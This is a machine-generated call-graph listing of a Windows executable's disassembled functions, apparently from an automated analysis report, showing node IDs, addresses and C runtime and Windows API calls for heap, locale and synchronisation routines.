15677->15678 15679 29aad 15678->15679 15679->15504 15681 2a5e4 _DecodePointerInternal 15680->15681 15682 2a5f3 15680->15682 15681->15682 15683 2a612 15682->15683 15684 2a604 TlsFree 15682->15684 15685 2d0b2 15683->15685 15686 2d09a DeleteCriticalSection 15683->15686 15684->15683 15688 2d0c4 DeleteCriticalSection 15685->15688 15689 2a932 15685->15689 15718 2c318 15686->15718 15688->15685 15689->15475 15744 2a539 _EncodePointerInternal 15690->15744 15692 29832 __init_pointers __initp_misc_winsig 15745 2d019 _EncodePointerInternal 15692->15745 15694 29858 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 15695 2d02f 15694->15695 15696 2d03a 15695->15696 15697 2d044 InitializeCriticalSectionAndSpinCount 15696->15697 15698 2aa23 15696->15698 15697->15696 15697->15698 15698->15521 15698->15522 15700 2dc2d 15699->15700 15702 2aa52 15700->15702 15703 2dc4b Sleep 15700->15703 15746 31603 15700->15746 15702->15522 15702->15527 15704 2dc60 15703->15704 15704->15700 15704->15702 15757 2aac0 15705->15757 15707 2a628 GetModuleHandleW 15758 2d1bd 15707->15758 15709 2a666 InterlockedIncrement 15765 2a6be 15709->15765 15712 2d1bd __lock 64 API calls 15713 2a687 15712->15713 15768 2ca63 InterlockedIncrement 15713->15768 15715 2a6a5 15780 2a6c7 15715->15780 15717 2a6b2 _raise 15717->15531 15719 2c323 HeapFree 15718->15719 15723 2c34c _free 15718->15723 15720 2c338 15719->15720 15719->15723 15724 2b059 15720->15724 15723->15683 15727 2a6d5 GetLastError 15724->15727 15726 2b05e GetLastError 15726->15723 15741 2a57f TlsGetValue 15727->15741 15730 2a742 SetLastError 15730->15726 15731 2dc24 __calloc_crt 62 API calls 15732 2a700 15731->15732 15732->15730 15733 2a708 _DecodePointerInternal 15732->15733 15734 2a71d 15733->15734 15735 2a721 15734->15735 15736 2a739 15734->15736 15737 2a61c __getptd_noexit 62 API calls 15735->15737 15738 2c318 _free 62 API calls 15736->15738 15740 2a729 GetCurrentThreadId 15737->15740 15739 2a73f 15738->15739 15739->15730 15740->15730 15742 2a594 _DecodePointerInternal TlsSetValue 15741->15742 15743 2a5af 15741->15743 15742->15743 15743->15730 15743->15731 15744->15692 15745->15694 15747 3160f 15746->15747 15754 3162a 15746->15754 15748 3161b 15747->15748 15747->15754 15749 2b059 __fclose_nolock 65 API calls 15748->15749 15751 31620 15749->15751 15750 3163d RtlAllocateHeap 15752 31664 15750->15752 15750->15754 15751->15700 15752->15700 15754->15750 15754->15752 15755 2d44a _DecodePointerInternal 15754->15755 15756 2d45f 15755->15756 15756->15754 15757->15707 15759 2d1d2 15758->15759 15760 2d1e5 EnterCriticalSection 15758->15760 15783 2d0f6 15759->15783 15760->15709 15762 2d1d8 15762->15760 15763 29aca __amsg_exit 65 API calls 15762->15763 15764 2d1e4 15763->15764 15764->15760 15945 2d0da LeaveCriticalSection 15765->15945 15767 2a680 15767->15712 15769 2ca81 InterlockedIncrement 15768->15769 15770 2ca84 15768->15770 15769->15770 15771 2ca91 15770->15771 15772 2ca8e InterlockedIncrement 15770->15772 15773 2ca9b InterlockedIncrement 15771->15773 15774 2ca9e 15771->15774 15772->15771 15773->15774 15775 2caa8 InterlockedIncrement 15774->15775 15777 2caab 15774->15777 15775->15777 15776 2cac4 InterlockedIncrement 15776->15777 15777->15776 15778 2cad4 InterlockedIncrement 15777->15778 15779 2cadf InterlockedIncrement 15777->15779 15778->15777 15779->15715 15946 2d0da LeaveCriticalSection 15780->15946 15782 2a6ce 15782->15717 15784 2d102 _raise 15783->15784 15785 2d128 15784->15785 15808 29ccc 15784->15808 15793 2d138 _raise 15785->15793 15844 2dbda 15785->15844 15791 2d14a 15796 2b059 __fclose_nolock 65 API calls 15791->15796 15792 2d159 15797 2d1bd __lock 65 API calls 15792->15797 15793->15762 15796->15793 15798 2d160 15797->15798 15799 2d193 15798->15799 15800 2d168 InitializeCriticalSectionAndSpinCount 15798->15800 15801 2c318 _free 65 API calls 15799->15801 15802 2d178 15800->15802 15803 2d184 15800->15803 15801->15803 15804 2c318 _free 65 API calls 15802->15804 15850 2d1af 15803->15850 15805 2d17e 15804->15805 15807 2b059 __fclose_nolock 65 API calls 15805->15807 15807->15803 15853 2dabd 15808->15853 15810 29cd3 15811 2dabd __NMSG_WRITE 66 API calls 15810->15811 15813 29ce0 15810->15813 15811->15813 15812 29b18 __NMSG_WRITE 66 API calls 15814 29cf8 15812->15814 15813->15812 15815 29d02 15813->15815 15816 29b18 __NMSG_WRITE 66 API calls 15814->15816 15817 29b18 15815->15817 15816->15815 15818 29b39 __NMSG_WRITE 15817->15818 15819 2dabd __NMSG_WRITE 63 API calls 15818->15819 15840 29c55 15818->15840 15821 29b53 15819->15821 15823 29c64 GetStdHandle 15821->15823 15824 2dabd __NMSG_WRITE 63 API calls 15821->15824 15822 29cc5 15841 297f1 15822->15841 15827 29c72 _strlen 15823->15827 15823->15840 15825 29b64 15824->15825 15825->15823 15826 29b76 15825->15826 15826->15840 15878 2921c 15826->15878 15830 29ca8 WriteFile 15827->15830 15827->15840 15830->15840 15831 29ba2 GetModuleFileNameW 15832 29bcf _wcslen 15831->15832 15833 29bc3 15831->15833 15834 2afa1 __invoke_watson 10 API calls 15832->15834 15837 2d951 63 API calls __NMSG_WRITE 15832->15837 15838 29c45 15832->15838 15887 2d9cb 15832->15887 15835 2921c __NMSG_WRITE 63 API calls 15833->15835 15834->15832 15835->15832 15837->15832 15896 2d7e0 15838->15896 15914 291d5 15840->15914 15924 297c1 GetModuleHandleW 15841->15924 15846 2dbe3 15844->15846 15847 2d143 15846->15847 15848 2dbfa Sleep 15846->15848 15927 2cdb5 15846->15927 15847->15791 15847->15792 15849 2dc0f 15848->15849 15849->15846 15849->15847 15944 2d0da LeaveCriticalSection 15850->15944 15852 2d1b6 15852->15793 15854 2dac9 15853->15854 15855 2dad3 15854->15855 15856 2b059 __fclose_nolock 66 API calls 15854->15856 15855->15810 15857 2daec 15856->15857 15860 2affd 15857->15860 15863 2afcb _DecodePointerInternal 15860->15863 15864 2afe0 15863->15864 15869 2afa1 15864->15869 15866 2aff7 15867 2afcb __fclose_nolock 10 API calls 15866->15867 15868 2b009 15867->15868 15868->15810 15872 2ae73 15869->15872 15873 2ae92 _memset __call_reportfault 15872->15873 15874 2aeb0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15873->15874 15875 2af7e __call_reportfault 15874->15875 15876 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15875->15876 15877 2af9a GetCurrentProcess TerminateProcess 15876->15877 15877->15866 15879 29231 15878->15879 15880 2922a 15878->15880 15881 2b059 __fclose_nolock 66 API calls 15879->15881 15880->15879 15885 29252 15880->15885 15882 29236 15881->15882 15883 2affd __fclose_nolock 11 API calls 15882->15883 15884 29240 15883->15884 15884->15831 15884->15832 15885->15884 15886 2b059 __fclose_nolock 66 API calls 15885->15886 15886->15882 15890 2d9dd 15887->15890 15888 2d9e1 15889 2b059 __fclose_nolock 66 API calls 15888->15889 15891 2d9e6 15888->15891 15895 2d9fd 15889->15895 15890->15888 15890->15891 15893 2da24 15890->15893 15891->15832 15892 2affd __fclose_nolock 11 API calls 15892->15891 15893->15891 15894 2b059 __fclose_nolock 66 API calls 15893->15894 15894->15895 15895->15892 15922 2a539 _EncodePointerInternal 15896->15922 15898 2d806 15899 2d893 15898->15899 15900 2d816 LoadLibraryW 15898->15900 15905 2d8ad _DecodePointerInternal _DecodePointerInternal 15899->15905 15912 2d8c0 15899->15912 15901 2d82b GetProcAddress 15900->15901 15906 2d92b 15900->15906 15904 2d841 7 API calls 15901->15904 15901->15906 15902 2d8f6 _DecodePointerInternal 15903 2d91f _DecodePointerInternal 15902->15903 15908 2d8fd 15902->15908 15903->15906 15904->15899 15909 2d883 GetProcAddress _EncodePointerInternal 15904->15909 15905->15912 15907 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15906->15907 15910 2d94a 15907->15910 15908->15903 15911 2d910 _DecodePointerInternal 15908->15911 15909->15899 15910->15840 15911->15903 15913 2d8e3 15911->15913 15912->15902 15912->15903 15912->15913 15913->15903 15915 291df IsDebuggerPresent 15914->15915 15916 291dd 15914->15916 15923 2de27 15915->15923 15916->15822 15919 2ae21 SetUnhandledExceptionFilter UnhandledExceptionFilter 15920 2ae46 GetCurrentProcess TerminateProcess 15919->15920 15921 2ae3e __call_reportfault 15919->15921 15920->15822 15921->15920 15922->15898 15923->15919 15925 297d5 GetProcAddress 15924->15925 15926 297e5 ExitProcess 15924->15926 15925->15926 15928 2ce32 15927->15928 15935 2cdc3 15927->15935 15929 2d44a _malloc _DecodePointerInternal 15928->15929 15930 2ce38 15929->15930 15931 2b059 __fclose_nolock 65 API calls 15930->15931 15943 2ce2a 15931->15943 15932 29ccc __FF_MSGBANNER 65 API calls 15937 2cdce 15932->15937 15933 2cdf1 RtlAllocateHeap 15933->15935 15933->15943 15934 29b18 __NMSG_WRITE 65 API calls 15934->15937 15935->15933 15936 2ce1e 15935->15936 15935->15937 15938 2d44a _malloc _DecodePointerInternal 15935->15938 15941 2ce1c 15935->15941 15939 2b059 __fclose_nolock 65 API calls 15936->15939 15937->15932 15937->15934 15937->15935 15940 297f1 __mtinitlocknum 3 API calls 15937->15940 15938->15935 15939->15941 15940->15937 15942 2b059 __fclose_nolock 65 API calls 15941->15942 15942->15943 15943->15846 15944->15852 15945->15767 15946->15782 15949 29fbd 15947->15949 15951 2a02a 15949->15951 15957 2db59 15949->15957 15950 2a128 15950->15564 15950->15566 15951->15950 15952 2db59 76 API calls __wincmdln 15951->15952 15952->15951 15954 2ca50 15953->15954 15955 2ca49 15953->15955 15954->15560 16281 2c8a1 15955->16281 15960 2db01 15957->15960 15963 292e9 15960->15963 15964 292fc 15963->15964 15970 29349 15963->15970 15971 2a753 15964->15971 15967 29329 15967->15970 15991 2c589 15967->15991 15970->15949 15972 2a6d5 __getptd_noexit 66 API calls 15971->15972 15973 2a75b 15972->15973 15974 29301 15973->15974 15975 29aca __amsg_exit 66 API calls 15973->15975 15974->15967 15976 2cd37 15974->15976 15975->15974 15977 2cd43 _raise 15976->15977 15978 2a753 __getptd 66 API calls 15977->15978 15979 2cd48 15978->15979 15980 2cd76 15979->15980 15982 2cd5a 15979->15982 15981 2d1bd __lock 66 API calls 15980->15981 15983 2cd7d 15981->15983 15984 2a753 __getptd 66 API calls 15982->15984 16007 2cce5 15983->16007 15990 2cd5f 15984->15990 15988 29aca __amsg_exit 66 API calls 15989 2cd6d _raise 15988->15989 15989->15967 15990->15988 15990->15989 15992 2c595 _raise 15991->15992 15993 2a753 __getptd 66 API calls 15992->15993 15994 2c59a 15993->15994 15995 2d1bd __lock 66 API calls 15994->15995 15997 2c5ac 15994->15997 15996 2c5ca 15995->15996 15998 2c613 15996->15998 16000 2c5e1 InterlockedDecrement 15996->16000 16001 2c5fb InterlockedIncrement 15996->16001 15999 2c5ba _raise 15997->15999 16003 29aca __amsg_exit 66 API calls 15997->16003 16277 2c624 15998->16277 15999->15970 16000->16001 16004 2c5ec 16000->16004 16001->15998 16003->15999 16004->16001 16005 2c318 _free 66 API calls 16004->16005 16006 2c5fa 16005->16006 16006->16001 16008 2ccf2 16007->16008 16009 2cd27 16007->16009 16008->16009 16010 2ca63 ___addlocaleref 8 API calls 16008->16010 16015 2cda4 16009->16015 16011 2cd08 16010->16011 16011->16009 16018 2caf7 16011->16018 16276 2d0da LeaveCriticalSection 16015->16276 16017 2cdab 16017->15990 16019 2cb8b 16018->16019 16020 2cb08 InterlockedDecrement 16018->16020 16019->16009 16032 2cb95 16019->16032 16021 2cb20 16020->16021 16022 2cb1d InterlockedDecrement 16020->16022 16023 2cb2a InterlockedDecrement 16021->16023 16024 2cb2d 16021->16024 16022->16021 16023->16024 16025 2cb37 InterlockedDecrement 16024->16025 16026 2cb3a 16024->16026 16025->16026 16027 2cb44 InterlockedDecrement 16026->16027 16029 2cb47 16026->16029 16027->16029 16028 2cb60 InterlockedDecrement 16028->16029 16029->16028 16030 2cb70 InterlockedDecrement 16029->16030 16031 2cb7b InterlockedDecrement 16029->16031 16030->16029 16031->16019 16033 2cc19 16032->16033 16039 2cbac 16032->16039 16034 2cc66 16033->16034 16035 2c318 _free 66 API calls 16033->16035 16047 2cc8f 16034->16047 16102 30ad1 16034->16102 16038 2cc3a 16035->16038 16036 2cbe0 16041 2cc01 16036->16041 16052 2c318 _free 66 API calls 16036->16052 16042 2c318 _free 66 API calls 16038->16042 16039->16033 16039->16036 16045 2c318 _free 66 API calls 16039->16045 16043 2c318 _free 66 API calls 16041->16043 16048 2cc4d 16042->16048 16049 2cc0e 16043->16049 16044 2ccd4 16050 2c318 _free 66 API calls 16044->16050 16051 2cbd5 16045->16051 16046 2c318 _free 66 API calls 16046->16047 16047->16044 16053 2c318 66 API calls _free 16047->16053 16054 2c318 _free 66 API calls 16048->16054 16057 2c318 _free 66 API calls 16049->16057 16058 2ccda 16050->16058 16062 30ebb 16051->16062 16055 2cbf6 16052->16055 16053->16047 16056 2cc5b 16054->16056 16090 30e4d 16055->16090 16061 2c318 _free 66 API calls 16056->16061 16057->16033 16058->16009 16061->16034 16063 30ecc 16062->16063 16089 30fb5 16062->16089 16064 30edd 16063->16064 16065 2c318 _free 66 API calls 16063->16065 16066 30eef 16064->16066 16067 2c318 _free 66 API calls 16064->16067 16065->16064 16068 30f01 16066->16068 16069 2c318 _free 66 API calls 16066->16069 16067->16066 16070 30f13 16068->16070 16072 2c318 _free 66 API calls 16068->16072 16069->16068 16071 30f25 16070->16071 16073 2c318 _free 66 API calls 16070->16073 16074 2c318 _free 66 API calls 16071->16074 16075 30f37 16071->16075 16072->16070 16073->16071 16074->16075 16076 30f49 16075->16076 16077 2c318 _free 66 API calls 16075->16077 16078 30f5b 16076->16078 16080 2c318 _free 66 API calls 16076->16080 16077->16076 16079 30f6d 16078->16079 16081 2c318 _free 66 API calls 16078->16081 16082 30f7f 16079->16082 16083 2c318 _free 66 API calls 16079->16083 16080->16078 16081->16079 16084 30f91 16082->16084 16085 2c318 _free 66 API calls 16082->16085 16083->16082 16086 30fa3 16084->16086 16087 2c318 _free 66 API calls 16084->16087 16085->16084 16088 2c318 _free 66 API calls 16086->16088 16086->16089 16087->16086 16088->16089 16089->16036 16091 30e5a 16090->16091 16101 30eb2 16090->16101 16092 30e6a 16091->16092 16093 2c318 _free 66 API calls 16091->16093 16094 30e7c 16092->16094 16095 2c318 _free 66 API calls 16092->16095 16093->16092 16096 2c318 _free 66 API calls 16094->16096 16097 30e8e 16094->16097 16095->16094 16096->16097 16098 2c318 _free 66 API calls 16097->16098 16099 30ea0 16097->16099 16098->16099 16100 2c318 _free 66 API calls 16099->16100 16099->16101 16100->16101 16101->16041 16103 30ae2 16102->16103 16104 2cc84 16102->16104 16105 2c318 _free 66 API calls 16103->16105 16104->16046 16106 30aea 16105->16106 16107 2c318 _free 66 API calls 16106->16107 16108 30af2 16107->16108 16109 2c318 _free 66 API calls 16108->16109 16110 30afa 16109->16110 16111 2c318 _free 66 API calls 16110->16111 16112 30b02 16111->16112 16113 2c318 _free 66 API calls 16112->16113 16114 30b0a 16113->16114 16115 2c318 _free 66 API calls 16114->16115 16116 30b12 16115->16116 16117 2c318 _free 66 API calls 16116->16117 16118 30b19 16117->16118 16119 2c318 _free 66 API calls 16118->16119 16120 30b21 16119->16120 16121 2c318 _free 66 API calls 16120->16121 16122 30b29 16121->16122 16123 2c318 _free 66 API calls 16122->16123 16124 30b31 16123->16124 16125 2c318 _free 66 API calls 16124->16125 16126 30b39 16125->16126 16127 2c318 _free 66 API calls 16126->16127 16128 30b41 16127->16128 16129 2c318 _free 66 API calls 16128->16129 16130 30b49 16129->16130 16131 2c318 _free 66 API calls 16130->16131 16132 30b51 16131->16132 16133 2c318 _free 66 API calls 16132->16133 16134 30b59 16133->16134 16135 2c318 _free 66 API calls 16134->16135 16136 30b61 16135->16136 16137 2c318 _free 66 API calls 16136->16137 16138 30b6c 16137->16138 16139 2c318 _free 66 API calls 16138->16139 16140 30b74 16139->16140 16141 2c318 _free 66 API calls 16140->16141 16142 30b7c 16141->16142 16143 2c318 _free 66 API calls 16142->16143 16144 30b84 16143->16144 16145 2c318 _free 66 API calls 16144->16145 16146 30b8c 16145->16146 16147 2c318 _free 66 API calls 16146->16147 16148 30b94 16147->16148 16149 2c318 _free 66 API calls 16148->16149 16150 30b9c 16149->16150 16151 2c318 _free 66 API calls 16150->16151 16152 30ba4 16151->16152 16276->16017 16280 2d0da LeaveCriticalSection 16277->16280 16279 2c62b 16279->15997 16280->16279 16282 2c8ad _raise 16281->16282 16283 2a753 __getptd 66 API calls 16282->16283 16284 2c8b6 16283->16284 16285 2c589 __setmbcp 68 API calls 16284->16285 16286 2c8c0 16285->16286 16312 2c632 16286->16312 16289 2dbda __malloc_crt 66 API calls 16290 2c8e1 16289->16290 16291 2ca00 _raise 16290->16291 16319 2c6b3 16290->16319 16291->15954 16294 2c911 InterlockedDecrement 16296 2c932 InterlockedIncrement 16294->16296 16297 2c921 16294->16297 16295 2ca0d 16295->16291 16299 2ca20 16295->16299 16302 2c318 _free 66 API calls 16295->16302 16296->16291 16298 2c948 16296->16298 16297->16296 16301 2c318 _free 66 API calls 16297->16301 16298->16291 16304 2d1bd __lock 66 API calls 16298->16304 16300 2b059 __fclose_nolock 66 API calls 16299->16300 16300->16291 16303 2c931 16301->16303 16302->16299 16303->16296 16306 2c95c InterlockedDecrement 16304->16306 16307 2c9eb InterlockedIncrement 16306->16307 16308 2c9d8 16306->16308 16329 2ca02 16307->16329 16308->16307 16310 2c318 _free 66 API calls 16308->16310 16311 2c9ea 16310->16311 16311->16307 16313 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16312->16313 16314 2c646 16313->16314 16315 2c651 GetOEMCP 16314->16315 16316 2c66f 16314->16316 16318 2c661 16315->16318 16317 2c674 GetACP 16316->16317 16316->16318 16317->16318 16318->16289 16318->16291 16320 2c632 getSystemCP 78 API calls 16319->16320 16322 2c6d3 16320->16322 16321 2c6de setSBCS 16323 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16321->16323 16322->16321 16325 2c722 IsValidCodePage 16322->16325 16328 2c747 _memset __setmbcp_nolock 16322->16328 16324 2c89a 16323->16324 16324->16294 16324->16295 16325->16321 16326 2c734 GetCPInfo 16325->16326 16326->16321 16326->16328 16332 2c3f4 GetCPInfo 16328->16332 16393 2d0da LeaveCriticalSection 16329->16393 16331 2ca09 16331->16291 16335 2c428 _memset 16332->16335 16341 2c4dc 16332->16341 16342 30a8c 16335->16342 16337 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16339 2c582 16337->16339 16339->16328 16340 30955 ___crtLCMapStringA 82 API calls 16340->16341 16341->16337 16343 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16342->16343 16344 30a9f 16343->16344 16352 309a0 16344->16352 16347 30955 16348 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16347->16348 16349 30968 16348->16349 16369 30769 16349->16369 16353 309c9 MultiByteToWideChar 16352->16353 16354 309be 16352->16354 16355 309f2 16353->16355 16357 309f6 16353->16357 16354->16353 16356 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16355->16356 16358 2c497 16356->16358 16360 30a0b _memset __crtGetStringTypeA_stat 16357->16360 16361 2cdb5 _malloc 66 API calls 16357->16361 16358->16347 16359 30a44 MultiByteToWideChar 16362 30a6b 16359->16362 16363 30a5a GetStringTypeW 16359->16363 16360->16355 16360->16359 16361->16360 16365 292c4 16362->16365 16363->16362 16366 292e1 16365->16366 16367 292d0 16365->16367 16366->16355 16367->16366 16368 2c318 _free 66 API calls 16367->16368 16368->16366 16371 30787 MultiByteToWideChar 16369->16371 16372 307e5 16371->16372 16376 307ec 16371->16376 16373 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16372->16373 16375 2c4b7 16373->16375 16374 30839 MultiByteToWideChar 16377 30931 16374->16377 16378 30852 LCMapStringW 16374->16378 16375->16340 16379 2cdb5 _malloc 66 API calls 16376->16379 16383 30805 __crtGetStringTypeA_stat 16376->16383 16381 292c4 __freea 66 API calls 16377->16381 16378->16377 16380 30871 16378->16380 16379->16383 16382 3087b 16380->16382 16386 308a4 16380->16386 16381->16372 16382->16377 16384 3088f LCMapStringW 16382->16384 16383->16372 16383->16374 16384->16377 16385 308f3 LCMapStringW 16387 3092b 16385->16387 16388 30909 WideCharToMultiByte 16385->16388 16389 308bf __crtGetStringTypeA_stat 16386->16389 16390 2cdb5 _malloc 66 API calls 16386->16390 16391 292c4 __freea 66 API calls 16387->16391 16388->16387 16389->16377 16389->16385 16390->16389 16391->16377 16393->16331 16395 2db84 16394->16395 16396 2db8b 16394->16396 16395->16396 16401 2dba9 16395->16401 16397 2b059 __fclose_nolock 66 API calls 16396->16397 16398 2db90 16397->16398 16399 2affd __fclose_nolock 11 API calls 16398->16399 16400 2db9a 16399->16400 16400->15578 16401->16400 16402 2b059 __fclose_nolock 66 API calls 16401->16402 16402->16398 16404 2d5cb _EncodePointerInternal 16403->16404 16404->16404 16405 2d5e5 16404->16405 16405->15592 16409 2d568 16406->16409 16408 2d5b6 16408->15594 16410 2d574 _raise 16409->16410 16417 2980e 16410->16417 16416 2d595 _raise 16416->16408 16418 2d1bd __lock 66 API calls 16417->16418 16419 29815 16418->16419 16420 2d477 _DecodePointerInternal _DecodePointerInternal 16419->16420 16421 2d526 16420->16421 16422 2d4a5 16420->16422 16431 2d59e 16421->16431 16422->16421 16434 315bd 16422->16434 16424 2d509 _EncodePointerInternal _EncodePointerInternal 16424->16421 16425 2d4b7 16425->16424 16427 2d4db 16425->16427 16441 2dc75 16425->16441 16427->16421 16428 2dc75 __realloc_crt 70 API calls 16427->16428 16429 2d4f7 _EncodePointerInternal 16427->16429 16430 2d4f1 16428->16430 16429->16424 16430->16421 16430->16429 16467 2981c 16431->16467 16435 315c8 16434->16435 16436 315dd HeapSize 16434->16436 16437 2b059 __fclose_nolock 66 API calls 16435->16437 16436->16425 16438 315cd 16437->16438 16439 2affd __fclose_nolock 11 API calls 16438->16439 16440 315d8 16439->16440 16440->16425 16443 2dc7e 16441->16443 16444 2dcbd 16443->16444 16445 2dc9e Sleep 16443->16445 16446 3168a 16443->16446 16444->16427 16445->16443 16447 316a0 16446->16447 16448 31695 16446->16448 16450 316a8 16447->16450 16459 316b5 16447->16459 16449 2cdb5 _malloc 66 API calls 16448->16449 16451 3169d 16449->16451 16452 2c318 _free 66 API calls 16450->16452 16451->16443 16466 316b0 _free 16452->16466 16453 316ed 16454 2d44a _malloc _DecodePointerInternal 16453->16454 16456 316f3 16454->16456 16455 316bd HeapReAlloc 16455->16459 16455->16466 16457 2b059 __fclose_nolock 66 API calls 16456->16457 16457->16466 16458 3171d 16461 2b059 __fclose_nolock 66 API calls 16458->16461 16459->16453 16459->16455 16459->16458 16460 2d44a _malloc _DecodePointerInternal 16459->16460 16463 31705 16459->16463 16460->16459 16462 31722 GetLastError 16461->16462 16462->16466 16464 2b059 __fclose_nolock 66 API calls 16463->16464 16465 3170a GetLastError 16464->16465 16465->16466 16466->16443 16470 2d0da LeaveCriticalSection 16467->16470 16469 29823 16469->16416 16470->16469 16472 16c91 GetLastError 16471->16472 16473 16cc4 16471->16473 16475 16c9d 16472->16475 16474 16e70 16473->16474 16476 16cf5 lstrlenW 16473->16476 16487 16d34 16473->16487 16492 18889 7 API calls 16473->16492 16486 16e90 LocalFree 16474->16486 16733 199d2 16474->16733 16478 1854a 118 API calls 16475->16478 16479 16d01 CompareStringW 16476->16479 16480 16d3e lstrlenW 16476->16480 16481 16cbd 16478->16481 16479->16473 16479->16480 16482 16d4b CompareStringW 16480->16482 16483 16d8e lstrlenW 16480->16483 16481->15611 16482->16473 16482->16483 16484 16ddb lstrlenW 16483->16484 16485 16d9b CompareStringW 16483->16485 16489 16e08 lstrlenW 16484->16489 16490 16de8 CompareStringW 16484->16490 16485->16473 16485->16484 16486->16481 16487->16486 16491 1854a 118 API calls 16487->16491 16493 16e32 lstrlenW 16489->16493 16494 16e15 CompareStringW 16489->16494 16490->16473 16490->16489 16491->16486 16492->16473 16493->16473 16495 16e3f CompareStringW 16493->16495 16494->16473 16494->16493 16495->16473 16746 19ca3 16496->16746 16499 18450 16501 18889 7 API calls 16499->16501 16502 18480 16499->16502 16500 18444 GetLastError 16500->16499 16503 1846f 16501->16503 16502->15606 16503->16502 16753 185b2 16503->16753 16808 19cfe 16505->16808 16508 1854a 118 API calls 16509 15af6 16508->16509 16509->15656 16510 16123 16509->16510 16511 161e5 16510->16511 16512 1614a 16510->16512 16514 15b19 16511->16514 16516 1a46e 12 API calls 16511->16516 16515 16204 16512->16515 16519 1616d 16512->16519 16844 19dc6 16512->16844 16514->15656 16523 16ef5 16514->16523 16518 1854a 118 API calls 16515->16518 16516->16514 16518->16511 16519->16512 16520 1620b 16519->16520 16522 161e2 16519->16522 16864 19ef3 16519->16864 16868 1a46e 16519->16868 16520->16515 16522->16511 16957 16f5c 16523->16957 16526 16f0f 16529 1854a 118 API calls 16526->16529 16534 15b53 16529->16534 16530 16f35 16989 17c12 16530->16989 16533 184c7 118 API calls 16533->16534 16534->15634 16534->15656 16536 16260 16535->16536 16562 16251 16535->16562 16537 162fd 16536->16537 16541 19dc6 52 API calls 16536->16541 16558 16289 16536->16558 16536->16562 16538 16353 16537->16538 16539 16307 GetProcessHeap HeapAlloc 16537->16539 17348 1676f 16538->17348 16539->16538 16542 16330 16539->16542 16540 1854a 118 API calls 16543 163f3 16540->16543 16541->16536 16542->16562 16546 168fb 10 API calls 16543->16546 16553 163fa 16546->16553 16547 184c7 118 API calls 16550 16379 16547->16550 16548 19ef3 2 API calls 16548->16558 16549 15b83 16549->15641 16549->15656 17368 169b0 16550->17368 16551 16421 GetProcessHeap HeapFree 16551->16549 16554 16437 16551->16554 16553->16549 16553->16551 16555 1a46e 12 API calls 16553->16555 16557 19a29 GetLastError 16554->16557 16555->16553 16556 163d8 16559 169b0 SendMessageA 16556->16559 16557->16549 16558->16536 16558->16537 16558->16542 16558->16548 16560 163dd 16559->16560 17414 169e3 16560->17414 16562->16540 16562->16553 16563 1639b 16566 16381 16563->16566 16567 16445 16563->16567 17396 1a003 16563->17396 16565 169e3 EnterCriticalSection LeaveCriticalSection 16565->16566 16566->16556 16566->16562 16566->16563 16566->16565 16569 1644d 16566->16569 17373 1a222 16566->17373 16567->16569 16570 1854a 118 API calls 16569->16570 16570->16543 16572 15956 16571->16572 16573 15979 16571->16573 16572->16573 16574 15965 16572->16574 16575 15990 16573->16575 16576 1597e 16573->16576 16577 184c7 118 API calls 16574->16577 16579 184c7 118 API calls 16575->16579 16578 184c7 118 API calls 16576->16578 16581 15974 16577->16581 16582 1598b 16578->16582 16580 1599c 16579->16580 16580->15647 16581->15647 16582->15647 16584 15e2f _memset 16583->16584 16585 195c3 10 API calls 16584->16585 16586 15e44 16585->16586 16605 15e4a 16586->16605 18295 19663 16586->18295 16589 1854a 118 API calls 16590 16043 16589->16590 16594 19663 12 API calls 16590->16594 16595 1607b 16590->16595 16591 199d2 6 API calls 16592 15e77 16591->16592 16593 15e87 SetEnvironmentVariableW 16592->16593 16592->16605 16597 15ec9 SetEnvironmentVariableW 16593->16597 16598 15e9e GetLastError 16593->16598 16594->16595 16596 16089 16595->16596 16599 18e6f 3 API calls 16595->16599 16600 16097 16596->16600 16604 18e6f 3 API calls 16596->16604 16602 15f02 SetEnvironmentVariableW 16597->16602 16603 15ed7 GetLastError 16597->16603 16598->16605 16599->16596 16601 160a1 16600->16601 16606 18e6f 3 API calls 16600->16606 16601->15656 16603->16605 16604->16600 16605->16589 16606->16601 16626 15a77 GetEnvironmentVariableW 16625->16626 16627 29284 16626->16627 18322 2bf3c 16627->18322 16629 15aa8 16630 18889 16629->16630 16631 188a3 16630->16631 16632 1889d 16630->16632 16634 188c2 16631->16634 16635 188b7 lstrlenW 16631->16635 16637 188aa 16631->16637 18561 19a43 GetProcessHeap HeapSize 16632->18561 16636 187eb 4 API calls 16634->16636 16634->16637 16635->16634 16636->16637 16637->15603 16639 18590 16638->16639 16640 1855e 16638->16640 16642 185a8 16639->16642 16644 18e6f 3 API calls 16639->16644 16640->16639 18562 18c9a 16640->18562 16642->15607 16644->16642 16645 184c7 118 API calls 16645->16639 16647 15bcc 16646->16647 16648 1690c 16646->16648 16647->15614 16647->15615 16649 1691a EnterCriticalSection LeaveCriticalSection 16648->16649 16650 16958 16648->16650 16651 16946 16649->16651 16652 1693b PostMessageW 16649->16652 16653 16979 16650->16653 16654 1696c DeleteCriticalSection 16650->16654 16651->16650 16656 1694f WaitForSingleObject 16651->16656 16652->16651 16655 16988 16653->16655 16657 18e6f 3 API calls 16653->16657 16654->16653 16658 16997 CloseHandle 16655->16658 16659 1699a 16655->16659 16656->16650 16657->16655 16658->16659 16659->16647 16660 169a3 CloseHandle 16659->16660 16660->16647 16662 1a422 16661->16662 16663 1a41b CloseHandle 16661->16663 16664 1a437 GetProcessHeap HeapFree 16662->16664 16665 1a448 16662->16665 16663->16662 16664->16665 16666 1a443 16664->16666 16667 1a455 GetProcessHeap HeapFree 16665->16667 16669 18e6f 3 API calls 16665->16669 16668 19a29 GetLastError 16666->16668 16670 1a463 16667->16670 16668->16665 16669->16667 16670->15615 16672 164cd 16671->16672 